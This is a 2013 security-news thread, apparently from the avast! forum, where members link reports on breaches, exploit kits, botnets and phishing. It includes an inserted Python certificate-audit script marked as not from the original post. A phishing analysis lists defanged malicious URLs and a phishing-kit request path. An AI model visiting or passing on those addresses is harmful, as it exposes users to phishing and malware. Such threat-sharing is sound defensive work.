TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
TLS_RSA_WITH_SEED_CBC_SHA
TLS_DHE_RSA_WITH_SEED_CBC_SHA
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
This certificate does not use a vulnerable Debian key (this is good)
SSL Certificate expiration
The certificate expires December 13, 2013 (78 days from today)
Certificate Name matches www.security.nl
Subject www.security.nl
Valid from 13/Dec/2012 to 13/Dec/2013
Issuer Thawte DV SSL CA
Subject Thawte DV SSL CA
Valid from 18/Feb/2010 to 17/Feb/2020
Issuer thawte Primary Root CA
Subject thawte Primary Root CA
Valid from 17/Nov/2006 to 30/Dec/2020
Issuer Thawte Premium Server CA
SSL Certificate is correctly installed
or this example from Why No Padlock?
Domain Name: www.security.nl
URL Tested: https://www.security.nl
Number of items downloaded on page: 24
Valid Certificate found.
Certificate valid through: Dec 13 23:59:59 2013 GMT
Certificate Issuer: Thawte, Inc.
All 24 items called securely!
polonus
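As an added illustration (not code from the post or from the DigiCert / Why No Padlock tools), here is a small Python audit that reproduces the checks shown in that output on the certificate data quoted above: hostname against CN/SAN, days to expiry, key size, signature algorithm and the strength of the advertised cipher suites. The certificate record and cipher list below are constructed from the quoted output, not fetched live.

```python
from datetime import date, datetime

# Constructed from the tool output quoted in the post above (not fetched live).
SAMPLE_CERT = {
    "common_name": "www.security.nl",
    "subject_alt_names": ["www.security.nl"],
    "issuer": "Thawte DV SSL CA",
    "not_before": datetime(2012, 12, 13),
    "not_after": datetime(2013, 12, 13, 23, 59, 59),
    "key_bits": 2048,
    "sig_alg": "SHA1 + RSA",
}
# A representative subset of the suites listed in the quoted output.
SAMPLE_CIPHERS = [
    "TLS_RSA_WITH_RC4_128_MD5",
    "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
    "TLS_RSA_WITH_AES_128_GCM_SHA256",
    "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384",
]

WEAK_TOKENS = ("RC4", "3DES", "DES_", "MD5", "NULL", "EXPORT", "anon")


def hostname_matches(cert, host):
    """RFC 6125-style name check: SANs take precedence over the CN,
    and a '*' wildcard covers exactly one leftmost DNS label."""
    names = cert["subject_alt_names"] or [cert["common_name"]]
    host = host.lower().rstrip(".")
    for name in names:
        name = name.lower()
        if name.startswith("*."):
            suffix = name[1:]                 # ".example.com"
            label = host[: -len(suffix)] if host.endswith(suffix) else ""
            if label and "." not in label:
                return True
        elif name == host:
            return True
    return False


def days_to_expiry(cert, today):
    """Whole days from `today` until the certificate's notAfter date."""
    return (cert["not_after"].date() - today).days


def classify_cipher(name):
    """Return (strength, forward_secret) for an IANA cipher suite name.
    'weak' = broken primitives, 'legacy' = CBC/HMAC suites, 'strong' = AEAD."""
    if any(tok in name for tok in WEAK_TOKENS):
        strength = "weak"
    elif "_GCM_" in name or "CHACHA20" in name:
        strength = "strong"
    else:
        strength = "legacy"
    forward_secret = "_DHE_" in name or "_ECDHE_" in name
    return strength, forward_secret


def audit(cert, ciphers, host, today):
    """Run the same checks the quoted tools perform; returns (severity, message) findings."""
    findings = []
    if not hostname_matches(cert, host):
        findings.append(("fail", f"certificate name does not match {host}"))
    if not cert["not_before"].date() <= today <= cert["not_after"].date():
        findings.append(("fail", "certificate is outside its validity period"))
    days = days_to_expiry(cert, today)
    if days < 30:
        findings.append(("warn", f"certificate expires in {days} days"))
    if cert["key_bits"] < 2048:
        findings.append(("fail", f"RSA key too short: {cert['key_bits']} bits"))
    if "SHA1" in cert["sig_alg"]:
        # Rated "good" by the tool in 2013; browsers have since stopped accepting SHA-1 leaf certs.
        findings.append(("warn", "SHA-1 signature; modern browsers reject SHA-1 leaf certificates"))
    for suite in ciphers:
        if classify_cipher(suite)[0] == "weak":
            findings.append(("warn", f"weak cipher suite offered: {suite}"))
    if not any(classify_cipher(s)[1] for s in ciphers):
        findings.append(("warn", "no forward-secret (DHE/ECDHE) cipher suites offered"))
    return findings


if __name__ == "__main__":
    # The quoted report was run 78 days before the Dec 13, 2013 expiry, i.e. on 2013-09-26.
    for severity, message in audit(SAMPLE_CERT, SAMPLE_CIPHERS, "www.security.nl", date(2013, 9, 26)):
        print(f"[{severity}] {message}")
```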
-
Duh, iOS 7 Does Not Make Your iPhone, iPad Waterproof ;D
http://www.pcmag.com/article2/0,2817,2424780,00.asp
http://news.sky.com/story/1145439/waterproof-iphone-advert-owners-fooled
-
Unpatched IE-hole abused in cyber-espionage: http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/hand-me-downs-exploit-and-infrastructure-reuse-among-apt-campaigns.html link article authors Ned Moran and Nart Villeneuve
A MS Fix-it is available, but no patch has been issued yet,
pol
-
Illegal Access to Adobe Source Code
http://blogs.adobe.com/asset/2013/10/illegal-access-to-adobe-source-code.html
-
Hi Asyn,
And this as a reaction on this data breach: http://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
What are the implications going to be?
polonus
-
What are the implications going to be?
Well, we'll see over the next few days/weeks...
As you understand German: http://www.heise.de/security/meldung/Einbruch-bei-Adobe-Millionen-Kundendaten-sowie-Sourcecode-von-ColdFusion-und-Acrobat-geklaut-1972175.html
-
Microsoft Security Bulletin Advance Notification for October 2013
http://technet.microsoft.com/en-us/security/bulletin/ms13-oct
-
Hi Asyn,
Thanks for that article link.
Others here could Google-translate that article text into UK English or American English.
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Users should also explicitly allow the use of these readers in the browser
as is the rule with a lot of browsers now.
They should really pre-scan document links or re-check these particular software executables and update URIs for malcode.
Through these latest hacks Adobe has manoeuvred itself into the ranks of Java and likewise security-problematic codes.
polonus
-
Hi Asyn,
Thanks for that article link.
Others here could Google-translate that article text into UK English or American English.
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Users should also explicitly allow the use of these readers in the browser
as is the rule with a lot of browsers now.
They should really pre-scan document links or re-check these particular software executables and update URIs for malcode.
Through these latest hacks Adobe has manoeuvred itself into the ranks of Java and likewise security-problematic codes.
polonus
If you're using Chrome, it already handles that function. :)
-
Hi bob3160,
Writing this in Google Chrome actually, thanks for the reassurance. Good that Google Chrome was an early starter with Google Safe Browsing and plug-in security.
polonus
-
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Unrelated to this issue, I have done exactly that for a long time. (My personal suggestion is the free PDF-XChange Viewer.)
-
Couldn't we or shouldn't we further advise users to at least use another reader,
like for instance FoxIt for the time being until the security position of Adobe's been clarified.
Unrelated to this issue, I have done exactly that for a long time. (My personal suggestion is the free PDF-XChange Viewer.)
I have long given up Adobe Reader: bloated, vulnerable, a target for exploits.
I too have been using PDF-XChange Viewer for some time now (a year or more). I gave up on Foxit Reader; it became too much hassle and it tried to install other stuff.
-
Attempted hack against AVAST (https://blog.avast.com/2013/10/09/attempted-hack-against-avast/)
No one is ever 100% safe. We all need to stay vigilant!
-
No one is ever 100% safe. We all need to stay vigilant!
I wouldn't be too worried about an attempted hack, but only about a successful one. ;)
-
Redirect hides malicious Google Chrome extensions: http://blogs.technet.com/b/mmpc/archive/2013/10/11/redirect-hides-browser-extension.aspx
link article author = MMPC's Jonathan San Jose
polonus
-
Criminals Hit the ATM Jackpot (Symantec blog)
http://www.symantec.com/connect/blogs/criminals-hit-atm-jackpot
-
I just received the following and, it was not caught by Gmail
as Spam or a Phishing attempt:
(http://www.screencast-o-matic.com/screenshots/u/Lh/1381706175019-5667.png)
I don't have and have never had a Discover Card. The link provided leads to:
hxxp://alang-alang.vsu.edu.ph/language/red.php
-
PHISHING is from a link to hadamak dot com dot br -> http://support.clean-mx.de/clean-mx/phishing.php
and the site was also hacked earlier this year: https://www.zone-h.org/mirror/id/18886560
See for original site (IP migrated): http://urlquery.net/report.php?id=6704542
Just PM-ed mchain about this and have sent him an extensive report,
polonus
P.S. We seem to continue doing "under par" in the Brazilian malware theater, due to the fact that there exists an avast! mono-culture and malware is specifically hardened by malcreants to evade and circumvent avast detection, as we conclude from the avast detection rate of Brazilian banking malware, which is definitely under par. Tech also repeatedly complained about this situation. Avast should go "the extra mile" here. Like in the old days, Roman legionaries had the right to enlist (conscriptum) a citizen to carry their 65 KG pack for one mile; there was no dispute over this because every army road in the Roman Imperium had milestones. So that is where the saying originates.
Damian
-
They also have one prepared for Wells Fargo.
In case you didn't fall for the Discover Card Scam.
(http://www.screencast-o-matic.com/screenshots/u/Lh/1381753450480-731.png)
The link leads to the same hijacked place as the last one.
-
Hi bob3160,
Some further analysis observations:
See where the redirect went: alang-alang.vsu.edu.ph/language/red.php (no alerts detected now)
What was there before: http://urlquery.net/report.php?id=6711562
For the IDS alerts suppressed: http://www.support.jpgottech.com/knowledgebase.php?article=52 (info Knowledgebase)
And here we are at the malware redirect:
GET /components/com_jnews/includes/openflashchart/tmp-upload-images/discovercard/discovercard/discover/index.php HTTP/1.1
Host: -hadamak.com.br
See: htxp://lifestyle.fsp.co.za/errors
On that main site htxp://lifestyle.fsp.co.za
lifestyle.fsp.co dot za/sites/all/modules/lightbox2/js/modal.js?9 benign
[nothing detected] (script) lifestyle.fsp.co.za/sites/all/modules/lightbox2/js/modal.js?9
status: (referer=lifestyle.fsp.co.za/)saved 953 bytes 88f181fe0d9236fdf705dde023973361ed3716cb
info: [decodingLevel=0] found JavaScript
error: undefined variable Drupal
error: undefined variable Drupal.behaviors
error: line:1: SyntaxError: missing ; before statement: (will leads to warnings in some IE browsers)
error: line:1: var Drupal.behaviors = 1; (do not dump PHP variables into JavaScript strings in such a way)
error: line:1: ....^
suspicious:
polonus
-
Thanks Damian, but I never clicked the link so I was never in any danger from the redirect.
This just points out that when you click on things you have no business clicking,
Your computer will most likely take a licking! :)
-
Hi bob3160,
Very well put, bob3160. ;D
These are the things we learn here at the forums,
just to "really watch our clicks".
You might be just one click away from danger.
Keep that at the back of your mind always.
I hope a lot of trigger-happy clickers will read through these posts,
and learn from it or....
they have to learn it "the hard way", :(
polonus
-
I'm constantly getting this kind of email, but just ignore it if I know darned well I've never done business or had an account with them. On extremely rare occasions I'll get the same kind of phishing attempt supposedly from my own bank or Paypal (quite a few from the latter lately), and I just forward those to the respective anti-phishing addresses for any appropriate further action on their part.
(edit, Polonus posted while I was still typing) Interesting typo there, looks like you "downgraded" Bob by 10 and then gave it back to him in the next line. ;) ;D
-
A Google search reveals bob3150 to be a Poker Star. ;) Since I only bet on sure things, that's not me. :)
-
@bob3169: The poker star is gone, it is bob3160 again now.
@all
New threat and 35.000 websites hacked through a vBulletin hack: http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html and http://krebsonsecurity.com/2013/10/thousands-of-sites-hacked-via-vbulletin-hole/ (link article author Brian Krebs) - One should upgrade to a new version: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4000121-vbulletin-4-2-2-full-has-been-released
polonus
-
@polonus that's an old bug, abused by hackers since the 7th month (maybe the 6th) of this year and publicly known
http://forum.avast.com/index.php?topic=52252.msg984702#msg984702
-
Virus History
http://blogs.norman.com/2013/for-consumption/virus-history
-
This seems to be router firmware backdoor season, read: http://ea.github.io/blog/2013/10/18/tenda-backdoor/ (with an nmap test script)
This backdoor was detected by Craig of Embedded Systems, Reverse Engineering: -> http://www.devttys0.com/2013/10/from-china-with-love/
polonus
-
An interesting small video about the new Windows 8.1 boot protection, and a warning about the latest XP updates causing problems
http://technet.microsoft.com/en-us/windows/jj737995.aspx
http://kwsupport.com/2013/10/be-careful-with-kb2862330/
-
An interesting small video about the new Windows 8.1 boot protection, and a warning about the latest XP updates causing problems
http://technet.microsoft.com/en-us/windows/jj737995.aspx
http://kwsupport.com/2013/10/be-careful-with-kb2862330/
KB2862330 was apparently not for every OS. It isn't something I have on Windows 8.1 Pro
-
Some good news: after the Blackhole exploit kit went down, this time the Sweet Orange Exploit Kit has gone:
http://vrt-blog.snort.org/2013/10/sweet-orange-exploit-kit-was-new-king.html
link author = Joel Esler
polonus
-
Symantec Monthly Intelligence Report [pdf]: http://www.symantec.com/content/en/us/enterprise/other_resources/b-intelligence_report_09-2013.en-us.pdf
Archived reports, some dating back to 2002, can be gotten here: http://www.symantec.com/security_response/publications/archives.jsp
-
Google Safe Browsing malware alert on PHP.net: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.php.net/
Designers complain,
polonus
-
What to do if your computer is attacked by ransomware (https://blog.avast.com/2013/10/24/what-to-do-if-your-computer-is-attacked-by-ransomware/)
(https://blog.avast.com/wp-content/uploads/2013/10/Reveton-screenshot.png)
-
Hi bob3160,
Heard you can now also pay in Bitcoins ;D
No, of course you'd better not; thanks for the heads-up.
Damian
-
Dear AV provider: Do you enable NSA spying? Yours, EFF: http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/
-
Dear AV provider: Do you enable NSA spying? Yours, EFF: http://arstechnica.com/security/2013/10/dear-av-provider-do-you-enable-nsa-spying-yours-eff/
Do stupid questions really deserve an answer ???
-
What hackers can discover about you is 'chilling'
http://www.theage.com.au/digital-life/consumer-security/what-hackers-can-discover-about-you-is-chilling-20131028-2wbec.html
-
Adobe Breach Impacted At Least 38 Million Users
http://krebsonsecurity.com/2013/10/adobe-breach-impacted-at-least-38-million-users/
-
GWLoad mass injection malware is doing the rounds, 40.000 websites already infested: http://community.websense.com/blogs/securitylabs/archive/2013/10/29/gwload-new-mass-injection-making-its-rounds.aspx?cmpid=prfb
Security Unsavvy, do not say you haven't been warned!
polonus
-
Correct.
If a user ever encounters a proposed install of software they do not have at the moment, and it is on a site they do not know, or did not navigate to themselves, always treat the current window with suspicion and leave immediately!
No harm will come as one is free to leave as well as arrive.
Note that this infection campaign defeats and blocks the use of adblockers and reputation-based addons in your browsers when on an infected site.
New sites are created by the authors of this CPA campaign daily just to evade detection and cast the net wider and wider to lure unsuspecting visitors:
http://urlquery.net/report.php?id=7312506 See screenshot upper right.
Finally, always go to the actual vendors site to get the software you think you need, and nowhere else. ;)
-
Vulnerability Note VU#639620
Joomla! Media Manager allows arbitrary file upload and execution
http://www.kb.cert.org/vuls/id/639620
-
NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say
http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html
-
NSA infiltrates links to Yahoo, Google data centers worldwide, Snowden documents say
http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html
I think every country with an American Embassy is infiltrated by the NSA.
http://www.rappler.com/nation/42596-manila-us-listening-post
-
Upatre malware downloader infected 900.000 computers so far
Read: http://blogs.technet.com/b/mmpc/archive/2013/10/31/upatre-emerging-up-d-at-er-in-the-wild.aspx article author MMPC's Rodel Finones
also read: http://www.secureworks.com/cyber-threat-intelligence/threats/analyzing-upatre-downloader/ link authors: Brett Stone-Gross, Ph.D. and Russell Dickerson, Dell SecureWorks Counter Threat Unit(TM) Threat Intelligence
pol
-
nothing new....just Facebook again
Facebook users: watch out for two phishing fake-outs
http://blogs.norman.com/2013/for-consumption/facebook-users-watch-out-for-two-phishing-fake-outs
-
a horror story.....
Toy Story 2: How bad back-ups nearly destroyed the movie
http://blogs.norman.com/2013/for-consumption/toy-story-2-how-bad-back-ups-nearly-destroyed-the-movie
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666
http://securitygarden.blogspot.com.au/
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666
http://securitygarden.blogspot.com.au/
Windows 8 and 8.1 are not affected. :)
-
Vulnerability in Microsoft Graphics Component Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2896666
http://securitygarden.blogspot.com.au/
Windows 8 and 8.1 are not affected. :)
Yep, it's good to have the latest OS; safer than being sorry, rather than crawling down from W7 to the dead XP ;D
-
Microsoft rushes out fix to Office security exploit
http://www.theage.com.au/it-pro/security-it/microsoft-rushes-out-fix-to-office-security-exploit-20131105-hv2eo.html
The 20 most popular passwords stolen in Adobe hack
http://www.theage.com.au/digital-life/consumer-security/the-20-most-popular-passwords-stolen-in-adobe-hack-20131106-2x03o.html
'Anonymous' collective hackers intensify cyber attacks across south-east Asia
http://www.theage.com.au/it-pro/security-it/anonymous-collective-hackers-intensify-cyber-attacks-across-southeast-asia-20131104-hv2bx.html
Adobe hack: 38m users impacted, Photoshop source code also stolen
http://www.theage.com.au/it-pro/security-it/adobe-hack-38m-users-impacted-photoshop-source-code-also-stolen-20131029-hv2ab.html
-
more on the adobe hack
http://news.softpedia.com/news/Over-1-9-Million-of-Adobe-Hack-Victims-Used-123456-as-Password-397148.shtml
Top 100 Adobe Passwords with Count
http://stricture-group.com/files/adobe-top100.txt
-
Microsoft Security Intelligence Report – the State of Affairs
http://blogs.norman.com/2013/business/microsoft-security-intelligence-report-the-state-of-affairs
The numbers are clear – XP users are overrepresented on the infection statistics.
link to the report at the bottom of the article
-
GIMP flees SourceForge over dodgy ads and installer. (http://www.theregister.co.uk/2013/11/08/gimp_dumps_sourceforge_over_dodgy_ads_and_installer/)
Another download site that needs to be avoided. :'(
If you have no choice at least be aware of potential CrapWare included with your download.
-
Protecting windows users from malicious extensions
http://blog.chromium.org/2013/11/protecting-windows-users-from-malicious.html
-
Fake Facebook Scam about Oprah Winfrey committing suicide:
Scroll down to news section: (avast antivirus database update link) http://www.avast.com/en-us/lp-fr-virus-update?p_ext=chrome&utm_source=prg_fav_60_0&utm_medium=prg_lnk&utm_campaign=free2paid&utm_content=prg_fav_en-usvirus-update-default&p_var=.%2Ffa%2Fen-us%2Fvirus-update-default&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=363&p_lng=en&p_lid=en-us&p_elm=43&p_vbd=1367
For those who don't want to visit, see .jpg attached below:
-
Internet Explorer Zero-Day Flaw Exposes Windows 7, XP Users
http://news.softpedia.com/news/Internet-Explorer-Zero-Day-Flaw-Exposes-Windows-7-XP-Users-399035.shtml
-
Microsoft to Patch Internet Explorer Zero-Day Flaw Today
http://news.softpedia.com/news/Microsoft-to-Patch-Internet-Explorer-Zero-Day-Flaw-Today-399265.shtml
-
President Obama hacked – is anyone safe?
http://blogs.norman.com/2013/for-consumption/president-obama-hacked
-
President Obama hacked – is anyone safe?
http://blogs.norman.com/2013/for-consumption/president-obama-hacked
We all know that he's more of a target than any of us will ever be.
-
MacRumors Forums: Security Leak
http://www.macrumors.com/2013/11/12/macrumors-forums-security-leak/
http://arstechnica.com/security/2013/11/hack-of-macrumors-forums-exposes-password-data-for-860000-users/
-
If you've visited Cracked.com lately, You may have a Cracked Computer:
http://securitywatch.pcmag.com/malware/317941-cracked-com-had-malware-clean-up-your-computer-now
-
Read: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4007195-important-message-regarding-your-account
Change passwords and do not use any you used somewhere else in the past,
polonus
-
How to stop Google from using your Plus profile as caller ID
http://www.zdnet.com/how-to-stop-google-from-using-your-plus-profile-as-caller-id-7000023191/
-
(http://www.screencast-o-matic.com/screenshots/u/Lh/1384799979581-48653.png)
I just received this, as stated in the header, it is TRASH.
Do Not Reply, Do Not Open the Attachment
-
That's garbage.
In the rubbish can with it. And forget it.
-
That's garbage.
In the rubbish can with it. And forget it.
Do you not think Bob knows that!
The point in this topic is to warn others about security related issues and phishing emails are just one such instance.
-
At times very instructive to read what a developer should not do: https://www.owasp.org/index.php/How_to_write_insecure_code
(courtesy of OWASP dot org)
When I scan websites for malcode, I suspect some to use this as a manual ;D
polonus
-
200 websites compromised: http://www.pcworld.com/article/2064580/hackers-actively-exploiting-jboss-vulnerability-to-compromise-servers-researchers-say.html
pol
-
There was a new update for the Tor bundle: https://blog.torproject.org/blog/new-tor-browser-bundles-firefox-17011esr-and-tor-02418-rc
This should not give you a false sense of security.
Tor seems vulnerable to identifiers for NSA targeting, e.g. quantum cookie "packet injection" attacks,
injecting a 302 redirect to a FOXACID server, and other such methods of surveillance (ga.js &.o).
So some even go as far as to say: "Tor stinks", while it still upholds some form of anonymity.
All you do on the Internet now is in public and is not private.
Always be fully aware of these facts.
polonus
-
Fallout from Nuclear Pack exploit kit highly toxic for Windows machines
http://blog.avast.com/2013/11/20/fallout-from-nuclear-pack-exploit-kit-highly-toxic-for-windows-machines/
-
i2Ninja malware doing the rounds.
This new financial malware has been discovered using the I2P darknet to send stolen banking credentials to its command and control servers.
Read: http://www.trusteer.com/blog/out-of-the-shadows-%E2%80%93-i2ninja-malware-exposed (link article author = Etay Maor )
polonus
-
Seems the Google Play Store has apps with malware :-\
https://www.virustotal.com/en/file/536c95792e8820bb3b41c56b8b9d32a44cddc48c037efa9a0c04264421f6abe5/analysis/1385333474/
htxps://play.google.com/store/apps/details?id=com.bestfreeandroidwallpapers.wallpapermirandakerr&hl=en
-
Hi Pondus,
That is bad, now that we are only supposed to install exclusively from there.
Again do not trust anything by sight alone, investigate.
Better safe than sorry, Pondus.
Thanks for the heads-up on this one!
polonus
-
Seems like Android is following Windows: in searching for free wallpapers you could invariably find malware. The difference here is that it is in the Play Store, not just a result of a search.
-
Hi Pondus,
That is bad, now that we are only supposed to install exclusively from there.
Again do not trust anything by sight alone, investigate.
Better safe than sorry, Pondus.
Thanks for the heads-up on this one!
polonus
Polonus,
It's always good to get a heads-up on this sort of thing. Those in the know tend to have long memories like elephants, and seem to avoid potential pitfalls like this one, but I fear for those who do not make the daily effort to keep up with things, good as well as bad.
Not surprised at all by this news.
Even if you centralise the program download location as Google has now done, expect malcreants to find their way in. They do it everywhere else. That's their job and that is what they get up every day for. Like Anonymous says, "Expect Us". Some things never change.
@ DavidR, good point. ;D
-
We're making TOO MUCH CASH (http://www.theregister.co.uk/2013/11/25/cryptolocker_varmints_lower_decryption_price/)
'generous' cybercrooks to slash their demands.
Some good news! (Really ??? )
-
More like we're asking for too much in the way of extortion and people aren't prepared to pay.
-
Blackshades Rat Usage on the Rise Despite Author’s Alleged Arrest (Symantec blog)
http://www.symantec.com/connect/blogs/blackshades-rat-usage-rise-despite-author-s-alleged-arrest
-
Botnet survival spared as an important resource for official surveillance data, read ->
http://www.darkreading.com/attacks-breaches/a-mercenary-approach-to-botnets/240164329 link author = Gunter Ollman
pol
-
CryptoLocker uses email as main infection vector (see attached .jpg). Source: BleepingComputer.com. Infected websites are also a threat.
Full blog info here (including snipped .jpg below): http://www.bleepingcomputer.com/virus-removal/cryptolocker-ransomware-information
-
New Linux worm targets routers, cameras, “Internet of things” devices
Too many Internet-connected devices run code that's woefully out of date.
http://arstechnica.com/security/2013/11/new-linux-worm-targets-routers-cameras-internet-of-things-devices/
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices
http://www.symantec.com/security_response/writeup.jsp?docid=2013-112710-1612-99
-
Online safety: which website cares most about your data?
http://blogs.norman.com/2013/for-consumption/online-safety-which-website-cares-most-about-your-data
-
In the News: spying TVs and tea kettles, data leaks
http://blogs.norman.com/2013/business/in-the-news-spying-tvs-and-tea-kettles-data-leaks
-
Filecoder epidemic goes global as Australians among “millions” of victims worldwide (Eset )
http://www.welivesecurity.com/2013/11/28/filecoder-epidemic-goes-global-as-australians-among-millions-of-victims-worldwide/
-
Well I need help instead of commentating on the sticky thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again, about every 10 minutes, then 5 an hour later, and now it pops up about every 2 minutes. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
-
Well I need help instead of commentating on the sticky thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again, about every 10 minutes, then 5 an hour later, and now it pops up about every 2 minutes. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
Sorry but this topic is not for problem solving, please start a topic of your own in the Viruses and Worms section http://forum.avast.com/index.php?board=4.0
-
Major security hole in XP; the MS fix may well negatively affect sharing and networking
http://www.bbc.co.uk/news/technology-25152328
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
No
-
Would this thread also apply to websites that you attempt to visit and get a warning for?
this thread is for posting security news....
if you have virus or false positive problem use viruses and worms forum section
for removal help, follow the logs to assist in cleaning malware guide at top in that section and help will arrive...
-
Well I need help instead of commentating on the sticky thread or whatever it was. I went into a website and then Avast told me it was a malicious URL so I closed the page. Ever since I have gotten that notice over and over again, about every 10 minutes, then 5 an hour later, and now it pops up about every 2 minutes. I can't get it to stop, does this mean that that website has launched a virus that is still attacking my computer? ???
Hi Virushater47,
Please follow the above advice Pondus gave to user mjazz to get the help you need. It's not the correct thread to ask for such.
-
Rogue antivirus that takes webcam pictures of you
http://www.webroot.com/blog/2013/11/27/new-rogue-now-takes-screenshots/
-
Rogue antivirus that takes webcam pictures of you
http://www.webroot.com/blog/2013/11/27/new-rogue-now-takes-screenshots/
They would have a hard time here (even if it got past the defences), no webcam on this system :P
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205
Is this a known keylogger, or something new?
-
Cyber experts uncover 2 million stolen passwords to global Web accounts
http://in.reuters.com/article/2013/12/05/cybercrime-pony-idINDEE9B400D20131205
Is this a known keylogger, or something new?
Reading the article quoted tells you that this has nothing to do with keyloggers or anything new.
It points out that many people still haven't learned that 123456 or other such passwords aren't acceptable
and are easily compromised.
-
Reading the article quoted tells you that this has nothing to do with keyloggers or anything new.
It points out that many people still haven't learned that 123456 or other such passwords aren't acceptable
and are easily compromised.
I assumed that it did.
However:
"The massive data breach was a result of keylogging software maliciously installed on an untold number of computers around the world, researchers at cybersecurity firm Trustwave said. The virus was capturing log-in credentials for key websites over the past month and sending those usernames and passwords to a server controlled by the hackers."
http://money.cnn.com/2013/12/04/technology/security/passwords-stolen/
-
Microsoft disrupts ZeroAccess botnet in collaboration with FBI and Europol (http://www.neowin.net/news/microsoft-disrupts-zeroaccess-botnet-in-collaboration-with-fbi-and-europol)
Microsoft has revealed that it has disrupted a “rampant botnet” known as ‘ZeroAccess’ –
which has so far infected almost two million PCs –
in collaboration with the FBI, Europol and industry partners.
-
BGP exploit attack threat, read: http://www.renesys.com/2013/11/mitm-internet-hijacking/ link article author - Jim Cowie
Unwanted upstream providers?
Route monitoring should be brought in, see: http://www.bgpmon.net/services/route-monitoring/
polonus
-
Despite valiant takedown efforts #zeroaccess bots have already been updated with new ClickFraud infrastructure. The battle continues....
quote taken from -> https://twitter.com/threatintel/statuses/408989605178785792
Botnet has been updated with a new clickfraud method,
polonus
-
The NSA Uses Google's Cookies to Track Specific Targets
http://news.softpedia.com/news/The-NSA-Uses-Google-s-Cookies-to-Track-Specific-Targets-407977.shtml
-
Christmas time! Do you want a malware present?
Avast Blog: http://blog.avast.com/2013/12/12/christmas-time-do-you-want-a-malware-present/
Sample: https://www.virustotal.com/de/file/C669E7E9E9A6FA4E321670E8237AEFDE73991425B8320C23F3A9F9FACA61B7C3/analysis/
-
World-sucking Octopus launched: https://twitter.com/ODNIgov/status/408712553179533312/photo/1
polonus
-
Google Removes Vital Privacy Feature: https://www.eff.org/deeplinks/2013/12/google-removes-vital-privacy-features-android-shortly-after-adding-them
Also read: https://plus.google.com/+DannyHolyoake/posts/FkfBxA5i3iG
Good we still have this - XPrivacy: http://www.androidpolice.com/2013/06/23/xprivacy-gives-you-massive-control-over-what-your-installed-apps-are-allowed-to-do/
polonus
-
Upgrade to WordPress 3.8!
http://wordpress.org/news/2013/12/parker/
-
Blue Coat Acquires Norman Shark
http://normanshark.com/news-events/press-releases/blue-coat-acquires-norman-shark/
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
-
This is for the really paranoid :) .. This will work
http://www.cs.tau.ac.il/~tromer/acoustic/
-
It is time to change your Samsung account password, if you own one ;)
MediaTest Digital, a company which tests security of mobile devices and software, was able to elicit sensitive user data from Samsung accounts. Names, email addresses, and passwords were all at risk. MediaTest took the news to Heise Security - a tech news outlet based in Germany. The media was able to confirm that the hole did in fact exist by extracting users' private data from Samsung accounts as well. Heise took this information to Samsung, and the Korean manufacturer responded to the problem immediately. Only 5 days after receiving the report, the Korean giant announced publicly that the security hole has been fixed. There is no word on follow-up tests to verify whether or not the patch has actually been made though.
http://www.gsmarena.com/samsung_patches_security_hole_in_gs4-news-7398.php
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
